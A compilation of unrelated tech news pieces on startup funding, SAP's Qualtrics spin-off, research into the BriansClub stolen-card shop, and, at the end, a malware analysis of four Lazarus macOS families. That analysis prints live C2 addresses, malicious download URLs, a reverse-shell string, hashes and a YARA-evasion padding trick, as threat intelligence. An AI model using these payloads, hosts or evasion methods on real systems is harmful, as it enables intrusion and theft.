Hevo draws in $8 million Series A for its no-code data pipeline service

Hevo founders Manish Jethani and Sourabh Agarwal.

According to data pipeline startup Hevo, many small to medium-sized companies juggle more than 40 different applications to manage sales, marketing, finance, customer support and other operations. All of these applications are important sources of data that can be analyzed to improve a company’s performance. That data often remains separate, however, making it difficult for different teams to collaborate.

Hevo enables its clients’ employees to integrate data from more than 150 different sources, including enterprise software from Salesforce and Oracle, even if they don’t have any technical experience. The company announced today that it has raised an $8 million Series A round led by Singapore-based venture capital firm Qualgro and Lachy Groom, a former executive at payments company Stripe.

The round, which brings Hevo’s total raised so far to $12 million, also included participation from returning investors Chiratae Ventures and Sequoia Capital India’s early-stage startup program Surge. The company was first covered by TechCrunch when it raised seed funding in 2017.

Hevo’s Series A will be used to increase the number of integrations available on its platform, and hire sales and marketing teams in more countries, including the United States and Singapore. The company currently has clients in 16 markets, including the U.S., India, France, Australia and Hong Kong, and counts payments company Marqeta among its customers.

In a statement, Puneet Bysani, tech lead manager at Marqeta, said, “Hevo saved us many engineering hours, and our data teams could focus on creating meaningful KPIs that add value to Marqeta’s business. With Hevo’s pre-built connectors, we were able to get data from many sources into Redshift and Snowflake very quickly.”

Based in Bangalore and San Francisco, Hevo was founded in 2017 by chief executive officer Manish Jethani and chief technology officer Sourabh Agarwal. The two previously launched SpoonJoy, a food delivery startup that was acquired by Grofers, one of India’s largest online grocery delivery services, in 2015. Jethani and Agarwal spent a year working at Grofers before leaving to start Hevo.

Hevo originated in the challenges Jethani and Agarwal faced while developing tech for SpoonJoy’s order and delivery system.

“All of our team members would come to us and say, ‘hey, we want to look at these metrics,’ or we would ask our teams questions if something wasn’t working. Oftentimes, they would not have the data available to answer those questions,” Jethani told TechCrunch.

Then at Grofers, Jethani and Agarwal realized that even large companies face the same challenges. They decided to work on a solution to allow companies to quickly integrate data sources.

For example, a marketing team at an e-commerce company might have data about its advertising on social media platforms, and how much traffic campaigns bring to their website or app. But they might not have access to data about how many of those visitors actually make purchases, or if they become repeat customers. By building a data pipeline with Hevo, they can bring all that information together.

Hevo is designed to serve all sectors, including e-commerce, healthcare and finance. In order to use it, companies sign up for Hevo’s services on its website and employees enter their credentials for software supported by the platform. Then Hevo automatically extracts and organizes the data from those sources and prepares it for cloud-based data warehouses, such as Amazon Redshift and Snowflake. A user dashboard allows companies to customize integrations or hide sensitive data.

Hevo is among several “no code, low code” startups that have recently raised venture capital funding for building tools that enable non-developers to add features to their existing software. The founders say its most direct competitor is Fivetran, an Oakland, California-based company that also builds pipelines to move data to warehouses and prepare it for analysis.

Jethani said Hevo differentiates by “optimizing our product for non-technical users.”

“The number of companies who need to use data is very high and there is not enough talent available in the market. Even if it is available, it is very competitive and expensive to hire that engineering talent because big companies like Google and Amazon are also competing for the same talent,” he added. “So we felt that there has to be some democratization of who can use this technology.”

Hevo also focuses on integrating data in real time, which is especially important for companies that provide on-demand deliveries or services. During the COVID-19 pandemic, Jethani says e-commerce clients have used Hevo to manage an influx in orders as people under stay-at-home orders purchase more items online. Companies are also relying on Hevo to help organize and manage data as their employees continue to work remotely.

In a statement about the funding, Qualgro managing partner Heang Chhor said, “Hevo provides a truly innovative solution for extracting and transforming data across multiple data sources — in real time with full automation. This helps enterprises to fully capture the benefit of data flowing though the many databases and software they currently use. Hevo’s founders are the type of globally-minded entrepreneurs that we like to support.”

Hearsay, maker of compliant tools for financial services, deepens ties with Salesforce

Financial services companies like banks and insurance tend to be heavily regulated. As such, they require a special level of security and auditability. Hearsay, which makes compliant communications tools for these types of companies, announced a new partnership with Salesforce today, enabling smooth integration with Salesforce CRM and marketing automation tools.

The company also announced that Salesforce would be taking a minority stake in Hearsay, although company co-founder and CEO Clara Shih, did not provide any details on that part of the announcement.

Shih says the company created the social selling category when it launched 10 years ago. Today, it provides a set of tools like email, messaging and websites along with a governance layer to help financial services companies interact with customers in a compliant way. Their customers are primarily in banking, insurance, wealth management and mortgages.

She said that they realized if they could find a way to share the data they were collecting with the Hearsay tool set with CRM and marketing automation software in an automated way, it would make greater use of this information than it could on its own. To that end, they have created a set of APIs to enable that with some built-in connectors. The first one will be to connect Hearsay to Salesforce, with plans to add other vendors in the future.

“It’s about being able to connect [data from Hearsay] with the CRM system of record, and then analyzing it across thousands, if not tens of thousands of advisors or bankers in a single company, to uncover best practices. You could then use that information like GPS driving directions that help every advisor behave in the moment and reach out in the moment like the very best advisor would,” Shih explained.

In practice, this means sharing the information with the customer data platform (CDP), the CRM and marketing automation tooling to deliver more intelligent targeting based on a richer body of information. So the advisor can use information gleaned from everything he or she knows about the client across the set of tools to deliver a more meaningful personal message instead of a targeted ad or an email blast. As Shih points out, the ad might even make sense, but could be tone deaf depending on the circumstances.

“What we focus on is this human-client experience, and that can only be delivered in the last mile because it’s only with the advisor that many clients will confide in these very important life events and life decisions, and then conversely, it’s only in the last mile that the trusted advisor can deliver relationship advice,” she said.

She says what they are trying to do by combining streams of data about the customer is build loyalty in a way that pure technology solutions just aren’t capable of doing. As she says, nobody says they are switching banks because it has the best chat bot.

Hearsay was founded in 2009 and has raised $51 million, as well as whatever other money Salesforce will be adding to the mix with today’s investment. Other investors include Sequoia and NEA Associates. Its last raise was way back in 2013, a $30 million Series C.

Here’s Why Credit Card Fraud is Still a Thing

Most of the civilized world years ago shifted to requiring computer chips in payment cards that make it far more expensive and difficult for thieves to clone and use them for fraud. One notable exception is the United States, which is still lurching toward this goal. Here’s a look at the havoc that lag has wrought, as seen through the purchasing patterns at one of the underground’s biggest stolen card shops that was hacked last year.

In October 2019, someone hacked BriansClub, a popular stolen card bazaar that uses this author’s likeness and name in its marketing. Whoever compromised the shop siphoned data on millions of card accounts that were acquired over four years through various illicit means from legitimate, hacked businesses around the globe — but mostly from U.S. merchants. That database was leaked to KrebsOnSecurity, which in turn shared it with multiple sources that help fight payment card fraud.

An ad for BriansClub has been using my name and likeness for years to peddle millions of stolen credit cards.

Among the recipients was Damon McCoy, an associate professor at New York University’s Tandon School of Engineering [full disclosure: NYU has been a longtime advertiser on this blog]. McCoy’s work in probing the credit card systems used by some of the world’s biggest purveyors of junk email greatly enriched the data that informed my 2014 book Spam Nation, and I wanted to make sure he and his colleagues had a crack at the BriansClub data as well.

McCoy and fellow NYU researchers found BriansClub earned close to $104 million in gross revenue from 2015 to early 2019, and listed over 19 million unique card numbers for sale. Around 97% of the inventory was stolen magnetic stripe data, commonly used to produce counterfeit cards for in-person payments.

“What surprised me most was there are still a lot of people swiping their cards for transactions here,” McCoy said.

In 2015, the major credit card associations instituted new rules that made it riskier and potentially more expensive for U.S. merchants to continue allowing customers to swipe the stripe instead of dip the chip. Complicating this transition was the fact that many card-issuing U.S. banks took years to replace their customer card stocks with chip-enabled cards, and countless retailers dragged their feet in updating their payment terminals to accept chip-based cards.

Indeed, three years later the U.S. Federal Reserve estimated (PDF) that 43.3 percent of in-person card payments were still being processed by reading the magnetic stripe instead of the chip. This might not have been such a big deal if payment terminals at many of those merchants weren’t also compromised with malicious software that copied the data when customers swiped their cards.

Following the 2015 liability shift, more than 84 percent of the non-chip cards advertised by BriansClub were sold, versus just 35 percent of chip-based cards during the same time period.

“All cards without a chip were in much higher demand,” McCoy said.

Perhaps surprisingly, McCoy and his fellow NYU researchers found BriansClub customers purchased only 40% of its overall inventory. But what they did buy supports the notion that crooks generally gravitate toward cards issued by financial institutions that are perceived as having fewer or more lax protections against fraud.

Source: NYU.

While the top 10 largest card issuers in the United States accounted for nearly half of the accounts put up for sale at BriansClub, only 32 percent of those accounts were sold — and at a roughly half the median price of those issued by small- and medium-sized institutions.

In contrast, more than half of the stolen cards issued by small and medium-sized institutions were purchased from the fraud shop. This was true even though by the end of 2018, 91 percent of cards for sale from medium-sized institutions were chip-based, and 89 percent from smaller banks and credit unions. Nearly all cards issued by the top ten largest U.S. card issuers (98 percent) were chip-enabled by that time.

REGION LOCK

The researchers found BriansClub customers strongly preferred cards issued by financial institutions in specific regions of the United States, specifically Colorado, Nevada, and South Carolina.

“For whatever reason, those regions were perceived as having lower anti-fraud systems or those that were not as effective,” McCoy said.

Cards compromised from merchants in South Carolina were in especially high demand, with fraudsters willing to spend twice as much on those cards per capita than any other state — roughly $1 per resident.

That sales trend also was reflected in the support tickets filed by BriansClub customers, who frequently were informed that cards tied to the southeastern United States were less likely to be restricted for use outside of the region.

Image: NYU.

McCoy said the lack of region locking also made stolen cards issued by banks in China something of a hot commodity, even though these cards demanded much higher prices (often more than $100 per account): The NYU researchers found virtually all available Chinese cards were sold soon after they were put up for sale. Ditto for the relatively few corporate and business cards for sale.

A lack of region locks may also have caused card thieves to gravitate toward buying up as many cards as they could from USAA, a savings bank that caters to active and former military service members and their immediate families. More than 83 percent of the available USAA cards were sold between 2015 and 2019, the researchers found.

Although Visa cards made up more than half of accounts put up for sale (12.1 million), just 36 percent were sold. MasterCards were the second most-plentiful (3.72 million), and yet more than 54 percent of them sold.

American Express and Discover, which unlike Visa and MasterCard are so-called “closed loop” networks that do not rely on third-party financial institutions to issue cards and manage fraud on them, saw 28.8 percent and 33 percent of their stolen cards purchased, respectively.

PREPAIDS

Some people concerned about the scourge of debit and credit card fraud opt to purchase prepaid cards, which generally enjoy the same cardholder protections against fraudulent transactions. But the NYU team found compromised prepaid accounts were purchased at a far higher rate than regular debit and credit cards.

Several factors may be at play here. For starters, relatively few prepaid cards for sale were chip-based. McCoy said there was some data to suggest many of these prepaids were issued to people collecting government benefits such as unemployment and food assistance. Specifically, the “service code” information associated with these prepaid cards indicated that many were restricted for use at places like liquor stores and casinos.

“This was a pretty sad finding, because if you don’t have a bank this is probably how you get your wages,” McCoy said. “These cards were disproportionately targeted. The unfortunate and striking thing was the sheer demand and lack of [chip] support for prepaid cards. Also, these cards were likely more attractive to fraudsters because [the issuer’s] anti-fraud countermeasures weren’t up to par, possibly because they know less about their customers and their typical purchase history.”

PROFITS

The NYU researchers estimate BriansClub pulled in approximately $24 million in profit over four years. They calculated this number by taking the more than $100 million in total sales and subtracting commissions paid to card thieves who supplied the shop with fresh goods, as well as the price of cards that were refunded to buyers. BriansClub, like many other stolen card shops, offers refunds on certain purchases if the buyer can demonstrate the cards were no longer active at the time of purchase.

On average, BriansClub paid suppliers commissions ranging from 50-60 percent of the total value of the cards sold. Card-not-present (CNP) accounts — or those stolen from online retailers and purchased by fraudsters principally for use in defrauding other online merchants — fetched a much steeper supplier commission of 80 percent, but mainly because these cards were in such high demand and low supply.

The NYU team found card-not-present sales accounted for just 7 percent of all revenue, even though card thieves clearly now have much higher incentives to target online merchants.

A story here last year observed that this exact supply and demand tug-of-war had helped to significantly increase prices for card-not-present accounts across multiple stolen credit card shops in the underground. Not long ago, the price of CNP accounts was less than half that of card-present accounts. These days, those prices are roughly equivalent.

One likely reason for that shift is the United States is the last of the G20 nations to fully transition to more secure chip-based payment cards. In every other country that long ago made the chip card transition, they saw the same dynamic: As they made it harder for thieves to counterfeit physical cards, the fraud didn’t go away but instead shifted to online merchants.

The same progression is happening now in the United States, only the demand for stolen CNP data still far outstrips supply. Which might explain why we’ve seen such a huge uptick over the past few years in e-commerce sites getting hacked.

“Everyone points to this displacement effect from card-present to card-not-present fraud,” McCoy said. “But if the supply isn’t there, there’s only so much room for that displacement to occur.”

No doubt the epidemic of card fraud has benefited mightily from hacked retail chains — particularly restaurants — that still allow customers to swipe chip-based cards. But as we’ll see in a post to be published tomorrow, new research suggests thieves are starting to deploy ingenious methods for converting card data from certain compromised chip-based transactions into physical counterfeit cards.

A copy of the NYU research paper is available here (PDF).

ComplyAdvantage nabs $50M for an AI platform and database to detect and stop financial crime

The growth of digital banking has opened up a wealth of opportunities for making the world of finance more accessible and transparent to a greater number of people. But the darker underbelly is that it has also created more avenues for illicit activity to flourish, with some $2 trillion laundered annually but only 1-3% of that sum “caught.”

To help combat that, a London-based startup called ComplyAdvantage, which has built an AI platform and wider database of some 10 million entities to help identify and track those involved in financial crime, is today announcing a growth round of funding of $50 million to expand its reach and operations.

Specifically, the plan will be to use the funding for hiring, to invest in the tools it uses to detect entities and map the relationships between them and to bring on more clients.

“We’ve been focused on more granular analysis and being able to scale to hundreds of millions of searches across our database,” said Charles Delingpole, founder and CEO, said in an interview. “The next phase is more around the network of contacts and more enhanced diligence.” The company today has some 250 staff, mainly in the U.K. and Romania.

The Series C is being led by Ontario Teachers’ Pension Plan Board (Ontario Teachers’), a huge pension plan out of Canada (U.S. $155 billion) that is known as a prolific growth-stage tech investor.  Previous backers Balderton and Index are also in the round. The company has raised $88 million to date, and while it’s not disclosing its valuation, for some context, it was last valued at around $141 million in its last round a year ago, per PitchBook data.

Today, ComplyAdvantage has more than 500 customers, primarily financial institutions using it to meet regulatory compliance requirements as well as to reduce their own exposure and risk, providing some automated services to complement (and potentially replace) some of the manual checks that they make to prove you are who you say you are.

It also has a growing business with other groups that are tracking fraud for their own ends, such as insurance companies trying to stem fraudulent claims and government entities. It also has a number of partners that access its database and use that as part of their own solutions (Quantexa, which announced a big funding round of its own last week, is one of those licensing partners).

“A lot of companies in the wider identity space are powered by our data, even if they don’t disclose it,” Delingpole said.

The company had its start originally focusing on the process of helping banks meet regulatory compliance around fraud detection by ingesting and analysing documents provided by customers ahead of opening accounts, initiating larger transactions with new entities and so on. That has taken on a more targeted purpose in recent years as ComplyAdvantage’s database has grown deeper.

Today the core of the business is based around a central database of known money launderers, human traffickers, terrorists, drug lords and others who exploit financial rails to run illegal operations and make a profit from them.

It’s formed, Delingpole said, by way of “automatically ingesting tens of thousands of data points, from websites, national warning lists, linked real-time databases of companies and various other applications on top of that.” That central database is still growing, and Delingpole believes that it’s not unrealistic for it to run to a much higher number in order to get the most accurate picture possible.

“Although we have 10 million today, we want to cover every company and person one day. We think the right number is 8 billion” — that is, the world’s population. “With that larger database we can solve other kinds of crimes too.”

The startup already has a straight channel through to government agencies, reporting connections and discoveries on behalf of their clients directly to them. And to be clear, although there are now strong data protection measures in place in Europe, when people are linked to illegal activity, that puts them on a list that supersedes that. When someone is suspected and is tipped to authorities, that information is kept private.

While all institutions will continue to have teams of people dedicated to risk analysis and investigations into activity, the idea here is to supercharge that work with more data that helps those investigators tackle the greater scale of data in the world today.

“Detecting financial crime in billions of transactions that take place around the globe has become nearly impossible without the application of data science and machine learning. It is this approach that has made ComplyAdvantage into a leader in the category, and the go-to partner for organizations that seek to automate what are still very often manual or inadequate processes,” said Jan Hammer, a partner at Index Ventures, in a statement.

The longer-term opportunity is to build out ComplyAdvantage’s customer base by leveraging information that the company is already surfacing that might be relevant to other verticals.

Insurance is a key example, Delingpole said. “We already see a mention of a person having defaulted on a loan then making an insurance claim,” he said. “We see credit, fraud and ownership data together.”

This, of course, puts the company into close competition not just with others building credit databases but those building strong AI platforms to leverage data to gain deeper insights into seemingly disparate digital actions and to build better pictures of activity on behalf of their clients. That includes not just partners like Quantexa, but others like Palantir.

The strength here, said Delingpole, is the sheer size of ComplyAdvantage’s database and its very specific focus on financial crime and how that sits for companies that need to police that, both for their own business health and for regulatory reasons. It’s that focus that has attracted investment.

“ComplyAdvantage offers mission-critical technology solutions for combating financial crime and keeping pace with an ever-evolving regulatory landscape,” said Olivia Steedman, senior managing director, TIP, at Ontario Teachers’. “The company is well-positioned to continue its rapid growth as its powerful technology platform transforms the compliance and risk management process for its clients.”

Explorium reels in $31M Series B as data discovery platform grows

In a world with growing amounts of data, finding the right set for a particular machine learning model can be a challenge. Explorium has created a platform to make that an easier task, and today the startup announced a $31 million Series B.

The round was led by Zeev Ventures, with help from Dynamic Loop, Emerge, 01 Advisors and F2 Capital. Today’s investment brings the total raised to $50 million, according to the company.

CEO and co-founder Maor Shlomo says the company’s platform is designed to help people find the right data for their model. “The next frontier in analytics will not be about how you fine tune or improve a certain algorithm, it will be how do you find the right data to fit into those algorithms to make them as useful and impactful as possible,” he said.

He says that companies need this more than ever during the pandemic because this can help customers find more relevant data at a time when their historical data might not be useful to help build predictive models. For instance, if you’re a retailer, your historical shopping data won’t be relevant if you are in an area where you can no longer open your store, he says.

“There are so many environmental factors that are now influencing every business problem that organizations are trying to solve that Explorium is becoming this […] layer where you search for data to solve your business problems to fuel your predictive models,” he said.

When the pandemic hit in March, he worried about how it would affect his company, and he put a hold on hiring, but as he saw business increasing in April and May, he decided to accelerate again. The company currently has 87 employees between offices in Israel and the United States and he plans to be at 100 in the next couple of months.

When it comes to hiring, he says he doesn’t try to have hard and fast hiring rules like you have a certain degree or have gone to a certain school. “The only thing that’s important is getting good people hungry to succeed. The more diverse the culture is, the more diverse the group is, we find the more fun it is for people to discover each other and to discover different cultures,” Shlomo explained.

In terms of fundraising, while the company needs money to fuel its growth, at the same time it still had plenty of money in the bank from last year’s round. “We got into the pandemic and we didn’t know how long it’s going to last, and [early on] we didn’t yet know how it would impact the business. Existing investors were always bullish about the company. We decided to just go with that,” he said.

The company was founded in 2017 and previously raised a $19.1 million Series A round last year.

YC alum Paragon snags $2.5M seed for low-code app integration platform

Low-code is a hot category these days. It helps companies build workflows or simple applications without coding skills, freeing up valuable engineering resources for more important projects. Paragon, a member of the Y Combinator Winter 2020 cohort, announced a $2.5 million seed round today for its low-code application integration platform.

Investors include Y Combinator, Village Global, Global Founders Capital, Soma Capital and FundersClub.

“Paragon makes it easier for non-technical people to be able to build out integrations using our visual workflow editor. We essentially provide building blocks for things like API requests, interactions with third party APIs and conditional logic. And so users can drag and drop these building blocks to create workflows that describe business logic in their application,” says company co-founder Brandon Foo.

Foo acknowledges there are a lot of low-code workflow tools out there, but many like UIPath, Blue Prism and Automation Anywhere concentrate on Robotic Process Automation (RPA) to automate certain tasks. He says he and co-founder Ishmael Samuel wanted to focus on developers.

“We’re really focused on how can we improve developer efficiency, and how can we bring the benefits of low code to product and engineering teams and make it easier to build products without writing manual code for every single integration, and really be able to streamline the product development process,” Foo told TechCrunch.

The way it works is you can drag and drop one of 1200 predefined connectors for tools like Stripe, Slack and Google Drive into a workflow template, and build connectors very quickly to trigger some sort of action. The company is built on AWS serverless architecture, so you define the trigger action and subsequent actions, and Paragon handles all of the back-end infrastructure requirements for you.

It’s early days for the company. After launching in private beta in January, the company has 80 customers. It currently has 6 employees including Foo, who previously co-founded Polymail and Samuel, who was previously lead engineer at Uber. They plan to hire 4 more employees this year.

With both founders people of color, they definitely are looking to build a diverse team around them. “I think it’s already sort of built into our DNA. As a diverse founding team we have perhaps a broader viewpoint and perspective in terms of hiring the kind of people that we seek to work with. Of course, I think there’s always room for improvements, and so we’re always looking for new ways that we can be more inclusive in our hiring recruiting process [as we grow],” he said.

As far as raising during a pandemic, he says it’s been a crazy time, but he believes they are solving a real problem and that they can succeed in spite of the macro economic conditions of the moment.

SAP decision to spin out Qualtrics 20 months after spending $8B surprises industry watchers

When SAP announced it was spinning out Qualtrics on Sunday, a company it bought less than two years ago for an eye-popping $8 billion, it was enough to make your head spin. At the time, then CEO Bill McDermott saw it as a way to bridge the company’s core operational with customer data, while acquiring a cloud company that could help generate recurring revenue for the ERP giant, and maybe give it a dose of innovation along the way.

But Sunday night the company announced it was spinning out the acquisition, giving its $8 billion baby independence, and essentially handing the company back to founder Ryan Smith, who will become the largest individual shareholder when this all over.

It’s not every day you see founders pull in a windfall like $8 billion, get sucked into the belly of the large corporate beast and come out the other side just 20 months later with the cash, independence and CEO as the largest individual stockholder.

While SAP will own a majority of the stock, much like Dell owns a majority of VMware, the company will operate independently and have its own board. It can acquire other firms and make decisions separately from SAP.

We spoke to a few industry analysts to find out what they think about all this, and while the reasoning behind the move involves a lot of complex pieces, it could be as simple as the deal was done under the previous CEO, and the new one was ready to move on from it.

Bold step

It’s certainly unusual for a company like SAP to spend this kind of money, and then turn around so quickly and spin it off. In fact, Brent Leary, principal analyst at CRM Essentials, says that this was a move he didn’t see coming, and it could be related to that fat purchase price. “To me it could mean that SAP didn’t see the synergies of the acquisition panning out as they had envisioned and are looking to recoup some of their investment,” Leary told TechCrunch.

Holger Mueller, an analyst with Constellation Research agreed with Leary’s assessment, but doesn’t think that means the deal failed. “SAP doesn’t lose anything in regards to their […] data and experience vision, as they still retain [controlling interest in Qualtrics] . It also opens the opportunity for Qualtrics to partner with other ERP vendors [and broaden its overall market],” he said.

Jeanne Bliss, founder and president at CustomerBLISS, a company that helps clients deliver better customer experiences sees this as a positive step forward for Qualtrics. “This spin off enables Qualtrics to focus on its core business and prove its ability to provide essential technology executives are searching for to enable speed of decision making, innovation and customization,” she said.

Show me the money

Patrick Moorhead, founder and principal analyst at Moor Insight & Strategy sees the two companies moving towards a VMware/Dell model where SAP removes the direct link between them, which could then make them more attractive to a broader range of customers than perhaps they would have been as part of the SAP family. “The big play here is all financial. With tech stocks up so high, SAP isn’t seeing the value in its stock. I am expecting a VMware kind of alignment with a strategic collaboration agreement,” he said.

Ultimately though, he says the the move reflects a cultural failure on the part of SAP. It simply couldn’t find a way to co-exist with a younger, more nimble company like Qualtrics. “I believe SAP spinning out Qualtrics is a sign that its close connection to create symbiotic value has failed. The original charter was to bring it in to modernize SAP but apparently the “not invented here” attitudes kicked in and doomed integration,” Moorhead said.

That symbiotic connection would have involved McDermott’s vision of combining operational and customer data, but Leary also suggested that since the deal happened under previous the CEO, that perhaps new CEO Christian Klein wants to start with a clean slate and this simply wasn’t his deal.

Qualtrics for the win

In the end, Qualtrics got all that money, gets to IPO after all, and returns to being an independent company selling to a larger potential customer base. All of the analysts we spoke to agreed the news is a win for Qualtrics itself.

Leary says the motivation for the original deal was to give SAP a company that could sell beyond its existing customer base. “It seems like that was the impetus for the acquisition, and the fact that SAP is spinning it off as an IPO 20 months after acquiring Qualtrics gives me the impression that things didn’t come together as expected,” he said.

Mueller also sees nothing but postivies Qualtrics. “It’s a win […] for Qualtrics, which can now deliver what they wanted [from the start], and it’s a win for customers as Qualtrics can run as fast as they want,” he said.

Regardless, the company moves on, and the Qualtrics IPO moves forward, and it’s almost as though Qualtrics gets a do-over with $8 billion in its pocket for its trouble.

Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform

At the beginning of the year, Kaspersky reported new details of an ongoing campaign they called ‘AppleJeus’, attributed to North Korean-backed APT group Lazarus and first spotted in 2018. Kaspersky noted that as of January 2020, the Lazarus group was “currently one of the most active and prolific APT actors”. Since January, other reports have detailed a macOS RAT (DaclsRAT) and linked it to a wider Lazarus cross-platform toolset (MATA framework). Since late May 2020, we have observed three other distinct families of macOS malware likely from the same actors, most of which have not yet been publicly documented. In this post, we provide a high-level overview of all four of these macOS malware families and detail their variants and evolution so far.

1. Trojanized One-Time Password Apps

The first of these four families has been covered by other researchers in detail; here we will just summarize the main findings for completeness.

First seen on 8th April on VirusTotal, the so-called DaclsRAT malware was distributed as a trojanized “One-time-password” (OTP) app called TinkaOTP. The malware embeds a copy of the open-source MinaOTP project as cover for its malicious activities.

Written in Swift, the initial observed sample was built on a macOS 10.15.3 (19D76) machine, while a second version, compiled the following week on April 1st was built on 10.15.4 (19E266), indicating if nothing else that the malware authors were vigilant at keeping up with macOS updates on their own machines, whether virtual or metal-based.

As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle’s Resources folder. The file is a Mach-O binary disguised as a .nib file, at ../Resources/Base.lproj/Submenu.nib. This file is copied directly to the users Library folder and renamed as .mina. The dot prefix is added in order to make it invisible in the Finder. This payload is then executed via a user LaunchAgent at ~/Library/LaunchAgents/com.aex-loop.agent.plist.

The second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code are easily visible as they are unencrypted, plain UTF strings in the binary:

The .mina Mach-O payload itself contains a number of interesting UTF-16 strings that both indicate its purpose and it C2s.

67.43.239.146:443
185.62.58.207:443
plugin_file
plugin_process
/bin/bash
plugin_reverse_p2p
logsend
plugin_socks


The payload’s main() function is fairly succinct and hardcodes both the paths and contents for a LaunchAgent and LaunchDaemon to achieve persistence:

In an update last week, researchers suggested that the malware contained in the trojanized OTP app was in fact part of a larger toolkit they named ‘MATA’. Since extensive details of this have already been published, we refer interested readers to the earlier work.

2. New Trojanized CryptoTrading Apps

The second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no analysis from researchers, possibly due to its targeted nature and a lack of ITW sightings.

Trojanizing cryptocurrency-related apps is where the AppleJeus story began in 2018, and it seems the group must have met with reasonable success as 2020 has seen at least two new attempts, with CoinGoTrade and Cryptoistic.

We were first alerted to CoinGoTrade via a tweet on June 3rd from researcher @ccxsaber. A domain at coingotrade.com was set up to lure victims into downloading a fake cryptocurrency app. Although we were not able to source the app bundle, further investigation on VirusTotal revealed two samples of a malicious Mach-O binary that appear to have been the loader:

326d7836d580c08cf4b5e587434f6e5011ebf2284bbf3e7c083a8f41dac36ddd
4f9d2087fadbf7a321a4fbd8d6770a7ace0e4366949b4cfc8cbeb1e9427c02da

These two samples are both written in Objective-C rather than Swift, and appear identical save for a single line in the main() function, as shown by the following diff:

diff -y <(otool -tv 326d7836d580c08cf4b5e587434f6e5011ebf2284bbf3e7c083a8f41dac36ddd) 
0000000100001adc	movl $0x4c4b40, %edi | 0000000100001adc  movl $0x1, %edi

The hardcoded value of 0x4c4b40 is the number of seconds passed to the usleep function and equates to 5 seconds (5000000 microseconds). Given no other changes in the code between the two samples, it can be supposed that the second sample, which appeared on VirusTotal 14 days after the first, may have been released as a correction to the first. The cslp() function also causes the code to pause execution for short intervals, so it may be that the authors decided the call to usleep was redundant or somehow not producing the results they desired.

The samples embed calls to the following URL:

https://coingotrade.com/update_coingotrade.php

and post the following data to the server:

Unfortunately, we were not able to retrieve a sample of the payload executed out of /private/tmp/updatecoingotrade. However, clues to its likely behaviour may perhaps be found in a second trojanized cryptotrading app appearing on VirusTotal in early May 2020, called “Cryptoistic”.

Unlike the CoinGoTrade trojan, Cryptoistic is written in Swift, although it contains a great deal of code bridged to Objective C, perhaps indicating a developer more familiar with the older programming language. Cryptoistic was compiled on April 2nd, a day after the second version of TinkaOTP, but on a Mac device (real or virtual machine) running an older version of macOS than the one used for compiling the trojanized OTP apps: in this case, 10.15.2 (19C57).

Apple’s 19C57 release build had already been superseded several months earlier at the end of January, so at least here the threat actor’s build machine was not being kept up to date.

The main purpose of Cryptoistic appears to be to entrap users into creating a single account with the fake platform from which to manage multiple accounts on legitimate platforms such as kraken.com, huobi.por, and binance.com.

But perhaps most interesting of all is the hardcoded URL, "http://applepkg.com/product/new/iContact.pkg", which despite the .pkg suffix, in fact returns a Mach-O payload and drops it at /tmp/.signal_tmp.

The iContact binary appears to be a backdoor that gathers user and locale data and engages in encrypted communications with a C2 server over TCP. Functionality includes sending and receiving files and running custom commands such as scanning a directory and deleting files.

3. OSX.Casso | Backdoors Galore

At the same time as TinkaOTP, CoinGoTrade and Cryptoistic began circulating, so too did a family of lightweight, backdoor binaries, written primarily in Objective-C and C and making heavy use of standard C libraries built in to the operating system. For convenience, we call these closely-related variants OSX.Casso (the reason will become clear shortly).

The first of these appeared on VirusTotal on June 1st with the file name “osxari”.

3c2f7b8a167433c95aa919da9216f0624032ac9ed9dec71c3c56cacfd5cd1837

Several variants followed quickly after:

e63640c53204a59ba59f2c310964149ca3616d79adc40a6c3abd5bf669511756
65cc7663fa5c5665ad5d9c6bec2b6257612f9f0c0ce7e4399e6dc8b464ea88c0
035089b4ef4a981f43455ebee7963af9e7502170ca206458f96be668b1e3674a
(UPX PACKED; unpacks to: 85d7379b7b82d6b7868f64203a444a5098c72ed7ccff6d1dbb536389a5be5a9c)

and, later

2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b

The last of these was uploaded with the filename “cassoosx”. A quick search revealed that there is also a Windows variant cassou.exe (hence the name OSX.Casso):

90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b

What makes these macOS samples all of a piece can be seen from a diff of their Symbol tables, which are almost identical across the range of samples and include heavy use of the built-in libcurl.4.dylib.

A diff of the embedded strings also reveals some of the significant differences between the first and most recent of OSX.Casso samples:

diff -y  /dev/tcp/160.20.147.253/8443 0&1
_webident_f				 | _media_1
_webident_s				 | _media_2
https://fudcitydelivers.com/net.php	 | https://lastedforcast.com/list.php
https://fudcitydelivers.com/net.php	 | https://lastedforcast.com/list.php
https://sctemarkets.com/net.php		 | https://audiopodcasts.co/verify.php
xdns					 | darwin
					 > @_printf

The samples are almost identical except that “cassoosx” includes a reverse shell and different C2 domains. All of the samples except cassoosx are around 32Kb in size, but cassoosx has also been padded with several megabytes of junk printf calls, quite possibly to beat YARA rules that specify a max file size, such as those seen in the Apple’s static signature scanner XProtect.

Here we see the XProtect YARA rule for OSX.Casso:

rule XProtect_MACOS_b17a97e
{
	meta:
	description = "MACOS.b17a97e"
	strings:
		$s1 = { 89 C1 C1 E9 07 48 69 C9 11 08 04 02 48 C1 E9 20 69 C9 80 3F 00 00 F7 D9 }
	condition:
		Macho and filesize < 100KB and all of them
}

Although the rule’s single $s1 condition will hit on the cassoosx sample, the detection will fail as the binary size is well over the maximum 100Kb specified in the condition thanks to the padding:

A further change across OSX.Casso samples can be seen in the hardcoded User Agent strings and the version of Chrome that they denote, with the osxari User Agent encoded as follows:

3c2f7b8a167433c95aa919da9216f0624032ac9ed9dec71c3c56cacfd5cd1837
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36

and all later samples including cassoosx updated to Chrome 83:

2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36

